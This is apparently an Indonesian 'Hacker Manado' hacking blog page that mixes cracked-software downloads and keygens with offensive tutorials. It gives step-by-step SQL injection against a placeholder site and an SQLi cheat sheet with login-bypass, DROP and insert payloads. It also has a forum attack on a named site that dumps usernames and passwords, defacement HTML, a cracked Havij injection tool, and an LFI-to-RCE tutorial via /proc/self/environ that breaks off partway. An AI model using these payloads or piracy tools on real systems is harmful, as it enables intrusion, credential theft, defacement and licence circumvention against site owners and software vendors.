ACDSee Pro v5.0.110 Incl Keymaker-CORE

Untuk sahabat hacker manado yang mau belajar desain grafis,kali ini saya akan memberikan sebuah software gratis yang sudah full version untuk anda para hacker yang ingin menjadi belajar desain grafis.
nama software ini adalah :

 
ACDSee Pro v5.0.110 Incl Keymaker-CORE

Deskripsi: ACDSee Pro v5.0.110 Incl Keymaker-CORE adalah aplikasi penting untuk mendapatkan, mengorganisasi, melihat, meningkatkan dan berbagi foto digital Anda dan file media lainnya. Browser ACDSee Pro v5.0.110 Incl Keymaker-CORE yang memungkinkan Anda menyalin foto dari kamera ke komputer Anda, mengkategorikan dan menilai file Anda, dan mengatur koleksi foto dari berbagai ukuran - dari beberapa ratus hingga beberapa ratus ribu. Memilih untuk melihat preview thumbnail dari berbagai ukuran, atau menggunakan daftar terperinci file properti untuk mengurutkan file Anda. Tidak dapat menemukan foto tertentu? Tidak masalah - ACDSee Pro v5.0.110 Incl Keymaker-CORE mencakup berbagai alat-alat pencarian yang kuat dan Gambar Bandingkan fitur untuk menghilangkan duplikasi.

untuk yang mau mencoba  ACDSee Pro v5.0.110 Incl Keymaker-CORE ini silahkan download di bawah ini.

ACDSee Pro v5.0.110 Incl Keymaker-CORE



Tutorial hacker,cara menjadi hacker,software hacker 2011,hacker tutorial,tutorial menjadi hacker,tutorial hacker 2011,ilmu hacker,dunia hacker,ebook hacker,be a hacker,want to hack,how to hack,cara hack,

[Tutorial Hacking]SQL Injection Step By Step (For Dummies)

selamat siang sahabat Hacker Manado.
sore ini saya akan memberikan tutorial hacking dengan cara SQL Injection,
sebelum melangkah lebih jauh mari kita simak lebih dahulu tentang SQL injection.

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :


http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Tutorial hacking,ilmu hacking,dunia hacking,web category,menjadi hacker,be hackeron facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc,QExKrrTlbT1GibyKNb88rDqHAWM' name

Microsoft Windows 8 Developer Preview English, 32-bit (x86)

ini dia yang terbaru dari microsoft coorporation,
setelah sekian lama menanti akhirnya Microsoft Windows 8 Developer Preview English, 32-bit (x86) kini di publish.



Size: 2,825 MB

Persyaratan Sistem
Pratinjau Pengembang jendela karya-karya besar pada hardware yang sama bahwa kekuatan Windows Vista dan Windows 7:

1 gigahertz (GHz) atau lebih cepat 32-bit (x86) atau 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) atau 2 GB RAM (64-bit)
16 GB Tersedia ruang hard disk (32-bit) atau 20 GB (64-bit)
Perangkat grafis DirectX 9 dengan WDDM driver 1.0 atau lebih tinggi
Mengambil keuntungan dari input sentuhan memerlukan layar yang mendukung multi-touc

part 1
part 2
part 3
part 4
part 5
part 6
part 7
part 8
part 9
part 10
part 11
part 12
part 13
part 14
part 15 

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial

Uniblue PowerSuite 2011 v3 0 4 4 Serial termasuk Multibahasa

PowerSuite - adalah solusi lengkap untuk kinerja komputer Anda. MergingRegistryBooster, DriverScanner dan SpeedUpMyPC dalam antarmuka tunggal, meningkatkan PowerSuite dan perlindungan terhadap kelompok rentan, tapi sangat importantelement sistem terikat dengan kecepatan dan stabilitas.

anda bisa download gratis Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial disini
hanya di blog ini,
hanya di System [B]

Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc 

Adobe Photoshop Lightroom v3.5 Multilingual Incl Keymaker-CORE

Keterangan:
Adobe Photoshop Lightroom 3 perangkat lunak membantu Anda membawa keluar yang terbaik dalam foto Anda, apakah Anda menyempurnakan satu gambar, mencari sepuluh, pengolahan ratusan, atau mengorganisir gambar thousands.Create yang luar biasa yang menggerakkan audiens Anda. Percobaan tanpa rasa takut dengan negara-of-the-art alat editing tak rusak. Mudah mengelola semua gambar Anda. Dan memamerkan karya Anda di layout cetak elegan, menunjukkan slide, dan galeri web, serta pada populer situs berbagi foto. Semua dari dalam satu aplikasi cepat, intuitif.

Versi 3.5:

Adobe Photoshop Lightroom 3.5 pembaruan meliputi perangkat tambahan:

     * Dukungan kamera tambahan untuk lebih dari 20 model kamera baru termasuk Nikon Coolpix P7100, Olympus E-PL3 dan Sony SLT-A77
     * Koreksi untuk masalah diperkenalkan di versi sebelumnya dari Lightroom 3

part 1
part 2

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Adobe Photoshop Elements v10.0 MacOSX Incl Keymaker-CORE

Keterangan:
Adobe ® Photoshop ® Elements 10 - versi terbaru dari konsumen # 1 software1 mengedit foto - membantu Anda mengubah kenangan sehari-hari menjadi foto sensasional Anda akan menghargai selamanya. Mudah mengedit foto dan membuat kreasi foto menggunakan opsi otomatis, berbagi foto dengan jaringan sosial Anda, dan melihat foto hampir di mana saja Anda berada. Pemenang penghargaan selama 10 tahun! Kita semua memiliki pengalaman kehilangan momen spesial karena gangguan dalam foto kita. Dengan perangkat lunak Adobe ® Photoshop ® Elements 10, Anda langsung dapat menghapus objek yang tidak diinginkan atau cepat Ubah komposisi foto Anda dengan ukuran apapun. Atau hanya cat pada 1 dari 30 efek baru untuk mencapai hanya terlihat benar. Dengan cara itu Anda akan memiliki gambar yang sempurna untuk memberikan sebagai hadiah khusus atau berubah menjadi kreasi menyenangkan. Kenangan berharga Anda layak tidak kurang dari kesempatan untuk membuat mereka luar biasa, dengan Photoshop Elements.

part 1
part 2
part 3
part 4
part 5

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Havij 1.15 Pro Full

Selamat malam sobat hacker manado, malam ini saya akan memberikan kepada anda sebuah software untuk melakukan proses SQL Injection.

fitur baru dari havij 1.15 :

•      Webknight memotong WAF ditambahkan.
•      Mod_security Melewati dibuat lebih baik
•      Ditambahkan dukungan Unicode
•      Sebuah metode baru untuk tabel / kolom di MSSQL ekstraksi
•      Melanjutkan tabel sebelumnya / kolom ekstraksi tersedia
•      Pengganti kustom ditambahkan ke pengaturan
•      Nilai default injeksi ditambahkan ke pengaturan (bila menggunakan%% Inject_Here)
•      Tabel dan awalan kolom ditambahkan untuk suntikan buta
•      Tabel kustom dan daftar kolom menambahkan.
•      Waktu kustom ditambahkan.
•      Sebuah situs md5 cracker baru ditambahkan
•      bugfix: bug releating untuk SELECT perintah
•      bugfix: kolom string yang menemukan
•      bugfix: mendapatkan data kolom multi MSSQL
•      bugfix: mysql menemukan urutan kolom
•      bugfix: salah sintaks dalam jenis injeksi string di MSAccess
•      bugfix: hasil positif palsu telah dihapus
•      bugfix: ekstraksi data dikodekan di url-halaman
•      bugfix: memuat disimpan proyek
•      bugfix: beberapa kesalahan dalam ekstraksi data di MSSQL tetap.
•      bugfix: bug di MSAccess ketika menebak tabel dan kolom
•      bugfix: bug saat menggunakan proxy
•      bugfix: bug memungkinkan remote desktop di windows server 2008 (terima kasih kepada pegasus315)
•      bugfix: positif palsu dalam mencari kolom jumlah
•      bugfix: saat kesalahan metode berbasis MSSQL gagal
•      bugfix: bug dalam menyimpan data
•      bugfix: Oracle dan PostgreSQL deteksi  

Software ini sudah di crack dan siap digunakan, jadi sahabat hacker tinggal menggunakanya saja.
dan untuk menjadikannya full versi sahabat hacker tinggal klik tombol register saja.


langsung saja download disini :
Havij 1.15 Pro Full

Mini KMS Activator v1.31 Office 2010

selamta malam sahabat hacker manado, kali ini saya akan memberikan sebuah software bagi anda yang menggunkan Microsoft Office 2010 yang versi trial.
software ini berguna untuk menjadikan Microsoft office 2010 anda menjadi full version.

ini buktinya:

Featured :

• Optimized detect Office 2010 products on 64 edition of Windows.
• Setting of counter of rearms Office 2010 (counter is working for the rearms made with activator only).
• Install/Uninstall KMS emulator as Windows service without Command window.
• KMS emulator installation process is modified.
• The conflict with firewall is eliminated at run once KMS emulator.
• Function of copying of a path to the KMS emulator's file for adding in exceptions of Anti-Virus software.
• Internal errors reporting (eg: if activator components are blocked by antivirus software).
• Improved checking whether activator is running on behalf of administrator.
• Activator code optimization.

download disini
Mini KMS Activator v1.31 Office 2010 full

Software Serial Hunter

Anda menggunakan software trial?
tidak punya serial number?

tidak usah bingung.
hari ini saya akan membagikan anda sebuah software pencari serial number.
Tolls ini berfungsi untuk mencari serial number software anda dan menjadikannya Full Version secara gratis.

langsung saja menuju tempat download bagi sobat Hacker yang membutuhkan tools ini

download disini -----> Hacker Manado



Hacker Manado

Wireless Hacking Tools

kali ini Hacker Manado mau memberikan sobat Hacker sebuat tools yang bisa di gunakan untuk melakukan hacking Wireless.
Cara penggunaannya cukup mudah,dan saya rasa saya tidak perlu menjelaskan secara panjang lebar tentang cara penggunaannya.

jadi langsung saja menju tempat download.

download disini -----> Hacker Manado

Hacker Manado

CheatSheet SQL injection PART 1

Kali ini saya akan memberikan CheatSheet SQLI sebagai basic bagi anda yang mau belajar menjadi Hacker dengan teknik SQL Injection,
Ini adalah perintah perintah yang digunakan dalam melakukan SQLI saat proses Hacking.
Saat ini hanya untuk MySQL dan Microsoft SQL Server. Sebagian besar sampel tidak benar untuk setiap situasi tunggal. Sebagian besar lingkungan dunia nyata bisa berubah karena kurung, basis kode yang berbeda dan kalimat SQL.

Sampel disediakan untuk memungkinkan pembaca untuk mendapatkan ide dasar dari serangan potensial.

* M : MySQL
* S : SQL Server
* O : Oracle
* + : Possibly all other databases

Contoh;
(MS) MySQL dan SQL Server dll
(M * S) Hanya dalam beberapa versi MySQL atau kondisi khusus lihat terkait catatan dan SQL Server
Sintaks Referensi dengan Serangan Sampel Dasar
Akhir / Mengomentari Komentar Out Line / Queries
Line Komentar

(Komentar sisa query)

Komentar Line umumnya berguna untuk mengabaikan sisa query sehingga Anda dapat meninggalkan sejenak untuk memperbaiki seluruh query.

* — (SM)
DROP sampletable;–

* # (M)
DROP sampletable;#

Sampel Serangan SQL Injection.

* Username: admin’–
* SELECT * FROM members WHERE username = ‘admin’–’ AND password = ‘password’
Anda akan sebagai user admin, karena akhir dari query SQL akan diabaikan.

Inline Komentar

Komentar akhir query dengan tidak menutup atau menggunakannya untuk melewati daftar blacklisting, menghapus spasi, obfuscating dan menentukan versi database.

* /*Komentar Disini*/ (SM)
o DROP/*Komentar*/Contoh tabel
o DR/**/OP/*bypass blacklisting*/Contoh tabel
o SELECT/*avoid-spaces*/password/**/FROM/**/Members

* /*! MYSQL Special SQL */ (M)
Ini adalah sintaks komentar khusus untuk MySQL. Hal ini sempurna untuk mendeteksi versi MySQL. Jika Anda menempatkan kode ke dalam komentar itu anda akan mengeksekusi di MySQL. Anda juga dapat menggunakan ini untuk mengeksekusi beberapa kode hanya jika server lebih tinggi dari versi yang disediakan.

SELECT /*!32302 1/0, */ 1 FROM tablename

Contoh Serangan SQL Injection

* ID: /*!32302 10*/
* ID: 10
Anda akan mendapatkan respon yang sama jika versi MySQL lebih tinggi dari 3.23.02

Stacking Queries/Penumpukan Query

Menjalankan lebih dari satu permintaan dalam satu transaksi. Hal ini sangat berguna di setiap titik injeksi, khususnya di SQL Server back ended aplikasi.

* ; (S)
SELECT * FROM members; DROP members–

Query berakhir dan mulai yang baru.

*Tentang MySQL dan PHP;
Untuk memperjelas beberapa masalah;
PHP - MySQL tidak mendukung permintaan ditumpuk, Java tidak mendukung query ditumpuk (saya yakin untuk ORACLE,tapi tidak begitu yakin tentang database lainnya). Biasanya query MySQL mendukung ditumpuk tetapi karena lapisan database di sebagian besar konfigurasi itu berbeda jadi tidak mungkin untuk mengeksekusi query kedua dalam satu aplikasi PHP-MySQL atau mungkin MySQL klien mendukungan ini,saya tidak yakin. Dapatkah seseorang menjelaskan itu?
Contoh Serangan SQL Injection

* ID: 10;DROP members –
* SELECT * FROM products WHERE id = 10; DROP members–

Hal ini akan menjalankan anggota DROP dari SQL setelah Query SQL normal.
if statements

Dapatkan jawaban berdasarkan if statements adalah salah satu poin kunci dari Blind SQL Injection dan dapat sangat berguna untuk menguji hal-hal sederhana.
MySQL If Statement

* IF(condition,true-part,false-part) (M)
SELECT IF(1=1,’true’,'false’)

SQL Server If Statement

* IF contidion true-part ELSE false-part (S)
IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

Contoh Serangan SQL Injection

if ((select user) = ’sa’ OR (select user) = ‘dbo’) select 1 else select 1/0 (S)
Ini akan melemparkan sebuah pembagi dengan nol kesalahan jika user login saat itu tidak "sa" atau "dbo".
Menggunakan Integer

Berguna untuk melewati, magic_quotes () dan filter serupa, atau bahkan WAFs.

* 0xHEXNUMBER (SM)
Anda dapat menulis hex seperti ini;

SELECT CHAR(0×66) (S)
SELECT 0×5045 (ni bukan integer tapi string dari Hex) (M)
SELECT 0×50 + 0×45 (ini integer sekarang!) (M)

String Operations/Operasi String

String terkait operasi. Hal ini dapat sangat berguna untuk membangun injeksi yang tidak menggunakan tanda kutip, bypass setiap black listing lainnya atau menentukan database.

String Concatenation/Penggabungan String

* + (S)
SELECT login + ‘-’ + password FROM members

* || (*MO)
SELECT login || ‘-’ || password FROM members

*About MySQL `||`;
Jika MySQL bekerja dalam mode ANSI itu akan bekerja tetapi dinyatakan MySQL menerimanya sebagai operator logis `` itu akan kembali seperti semula. Lebih baik cara untuk melakukannya adalah dengan menggunakan CONCAT () fungsi di MySQL.

* CONCAT(str1, str2, str3, …) (M)
Menggabungkan string disediakan.
SELECT CONCAT(login, password) FROM members

String tanpa tanda kutip

Ini adalah beberapa cara langsung menggunakan string tapi ini selalu mungkin untuk menggunakan CHAR () (MS) dan CONCAT () (M) untuk menghasilkan string tanpa tanda kutip.

* 0×457578 (M) - Hex Representation of string/Representasi string
SELECT 0×457578
Ini akan dipilih sebagai string di MySQL.

* Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
Ini akan mengembalikan ¡®KLM¡¯.

* SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
Ini akan mengembalikan ¡®KLM¡¯.

String Modification & Related/Memodifikasi & Mengaitkan String

* ASCII() (SM)
Mengembalikan nilai ASCII karakter paling kiri. Harus memiliki fungsi untuk Suntikan Blind SQL.

SELECT ASCII(’a')

* CHAR() (SM)
Mengkonversi sebuah integer dari ASCII.

SELECT CHAR(64)

UNION ¨C Memperbaiki Masalah Bahasa

Sementara suntikan union kadang-kadang Anda akan mendapatkan error karena settingan bahasa yang berbeda (tabel, pengaturan lapangan, meja gabungan pengaturan db / dll) fungsi-fungsi ini sangat berguna untuk melewati masalah ini. Ini jarang tetapi jika Anda berhadapan dengan Jepang, Rusia,Turki dll. Maka Anda akan melihat perbedaannya.

* SQL Server (S)
Gunakan field SQL_Latin1_General_Cp1254_CS_AS atau field yang sah lainnya - lihat dokumentasi SQL Server.

* MySQL (M)
Hex() untuk setiap masalah yang mungkin

Login Screen (SMO+)
SQL Injection 101, trik Login

* admin’ –
* admin’ #
* admin’/*
* ‘ or 1=1–
* ‘ or 1=1#
* ‘ or 1=1/*
* ‘) or ‘1′=’1–
* ‘) or (’1′=’1–
* etc….

* Login as different user (SM*)
‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

*Old versions of MySQL tidak mendukung permintaan union
Kesalahan Berdasarkan - Find Columns Names
Finding Column Names with HAVING BY - Error Based (S)

Dalam urutan yang sama,

* ‘ HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 — dan seterusnya
* Jika Anda tidak mendapatkan kesalahan lebih dari itu maka beres.

menemukan berapa banyak columns dalam SELECT query by ORDER BY (MSO+)

Menemukan column number dari ORDER BY dapat mempercepat proses UNION SQL Injection.
* ORDER BY 1–
* ORDER BY 2–
* ORDER BY N– dan seterusnya
* Terus sampai mendapatkan error. Error berarti Anda telah menemukan jumlah kolom yang dipilih.

Data types, UNION, etc.
Hints,

* Selalu gunakan UNION ALL karena gambar jenis bidang yang sama tidak berbeda. Dengan Union default mencoba untuk mendapatkan catatan dengan berbeda.
* Untuk menghilangkan catatan unrequired dari penggunaan tabel kiri -1 atau tidak ada pencarian record pada awal query (jika injeksi di WHERE). Hal ini bisa menjadi penting jika Anda hanya mendapatkan satu hasil pada suatu waktu.
* Gunakan NULL dalam suntikan UNION untuk tipe data yang instead bukannya mencoba menebak string, tanggal, integer dll
o Hati-hati dalam Blind situtaions mungkin Anda bisa mengerti kesalahan yang berasal dari DB atau aplikasi itu sendiri. Karena bahasa-bahasa seperti ASP.NET umumnya melempar kesalahan saat mencoba untuk menggunakan nilai NULL (karena biasanya pengembang tidak mengharapkan untuk melihat NULL dalam bidang username)

Mencari Column Type

* ‘ union select sum(columntofind) from users– (S)
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server] Jumlah atau operasi agregat rata-rata tidak bisa mengambil tipe data varchar sebagai argumen.

Jika Anda tidak mendapatkan error itu berarti kolom numerik.

* Anda juga dapat menggunakan CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL–

* 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error - Syntax is right. MS SQL Server Used. Proceeding.

* 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C First column is an integer.

* 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 –
Error! ¨C Second column is not an integer.

* 11223344) UNION SELECT 1,¡¯2¡¯,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C Second column is a string.

* 11223344) UNION SELECT 1,¡¯2¡¯,3,NULL WHERE 1=2 ¨C-
Error! ¨C Third column is not an integer. …

Microsoft OLE DB Provider for SQL Server error ‘80040e07′
Explicit konversi dari tipe data int gambar tidak diperbolehkan.

Anda dapat convert() error sebelum target union errors! Jadi, mulailah dengan mengkonversi () Union
Simple Insert (MSO+)
‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )–
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

[Tutorial] Hacking Forum ASP For Newbie

Kali ini saya mencoba memberikan Tutorial Hacking Forum ASP.
Tutorial ini saya dapat dari Tim Hacker Indonesia.

Tutorial Hacking Forum ini cukup mudah untuk dilakukan.
langsung saja masuk langkah langkahnya,

Dork ::

inurl:/forums.asp?iFor=

ketikan perintah tersebut di kolom seach Google dan carilah target anda.

contah target :

http://www.antanio.com/forum/forums.asp?iFor=7

selanjutnya hapus angka dibelakang tanda [=] hingga menjadi seperti ini :

http://www.antanio.com/forum/forums.asp?iFor=7

kemudian tambahkan perintah SQL dibelakang tanda [=] dengan kode :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users
sehingga menjadi seperti ini :

http://www.antanio.com/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1  1,12+from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username nya,
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya.

pilih ID yang mau anda gunakan untuk login.
misalnya :
USERNAME : yama
PASSWORD : bkcidworm

Selamat,anda sudah berhasil menerobos Forum tersebut.
selanjutnya terserah anda mau melakukan kegiatan hacking apa.

Jika ingin menutup seluruh halaman tersebut gunakan kode script berikut :

<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: black 1px; WIDTH: 1000px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px; HEIGHT: 4000px; BACKGROUND-COLOR: black; layer-background-color: black"><center>
<br><b><font face="papyrus" color="red" size="5">..::HACKED BY Man In Black::..</font></h2><br><br><img src="http://img141.imageshack.us/img141/8227/anialienheadgrn02c.gif" ><br><br>
<font face="papyrus" color="red" size="5">Aceh Under Attack :<br></a><br><br>
<font face="papyrus" color="GREEN" size="2">thanks -->>>: </font><br><br><font color="GREY" size="5">HACKER COMMUNITY</font><br><font color="GREY" size="5">..::(Man In Black)::..</font><br><font color="green" size="2">http://indonesianhacker.org</font><br><br><font color="green" size="2">contact us: intel_88@yahoo.com

</DIV>

thanks to Indonesian Hacker
Hacker Manado

[Tutorial Hacking]Exploitasi LFI dengan injeksi Environ

Kali ini saya mencoba memberikan tutorial Hacking dengan teknik Explitasi LFI atau biasa disebut dengan Local File Inclusion.
Metodae LFI ini sama halnya dengan metode RFI atau Remote Command Execution yang tutorialnya saya akan bahas nanti.
Perbedaan antara keduanya adalah teknik hacking dengan metode RFI dilakukan dengan cara mengincludekan file secara remote.Sedangkan teknik  Hacking LFI maka kita bisa mengincludekan file yang ada di komputer victim secara langsung.Dari situlah kita bisa menyusup ke server target secara lebih dalam.
Banyak metode yang bisa kita lakukan,misalnya dengan menginjeksi apache log access,dll.
mengenai teknik apache log injection saya akan bahas nanti.




Pada tutorial kali ini,saya coba menjelaskan bagaimana membuat sebuah Remote Command Execution (RCE) pada LFI dengan memanfaatkan ENVIRON (/proc/self/environ). Bagaimana file environ  ini bisa menjadi sebuah RCE melalui LFI? jawabanya simple, karena kita bisa menginclude file environ ini, dan kita bisa memanipulasi header browser kita untuk mengirim membuat sebuah RCE dan mengexploitasinya.

teknik injeksi LFI,seperti pada umumnya,kita harus menemukan dulu direktori utama dari server ini.Teknik kuno yang ampuh adalah dengan mencoba satu persatu, dan menaikan ke tingkat direktori di atasnya.

Perhatikan ::

http://site.com/buglfi.php?exp=../etc/passwd   <<< percobaan pertama naik 1 direktori di atas.

bila gagal, naikan lagi ke direktori di atasnya lagi ::

http://site.com/buglfi.php?exp=../../etc/passwd
http://site.com/buglfi.php?exp=../../../etc/passwd
http://site.com/buglfi.php?exp=../../../../etc/passwd   <<< terus naik sampai file /etc/passwd terinclude.

contoh isi dari /etc/passwd

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

bila menemui halaman berisi seperti itu, berarti sudah ketemu letak direktori root. misal :

http://site.com/buglfi.php?exp=../../../../../etc/passwd

itu adalah teknik mendasar dari LFI. teknik tersebut tetep di perlukan untuk menemukan direktori root.

next, seperti yang saya katakan tadi, kita akan membuat RCE melalui ENVIRON.

Langsung aja kita include file environ ini.

http://site.com/buglfi.php?exp=../../../../../proc/self/environ

injek dan dapatkan output dari file ini. apa yang terlihat?

DOCUMENT_ROOT=/home/rialto/public_html?GATEWAY_INTERFACE=CGI/1.1?HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5?HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7?HTTP_ACCEPT_ENCODING=gzip,deflate?HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5?HTTP_CONNECTION=keep-alive?HTTP_HOST=www.liveattherialto.com?HTTP_KEEP_ALIVE=300?HTTP_USER_AGENT=[b]Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404[/b]

perhatikan output tersebut. amati apa yg tampak. cari2 apa yang bisa kita manfaatkan. cari detil demi detil. putar otak kiri kanan atas bawah.pasti ketemu
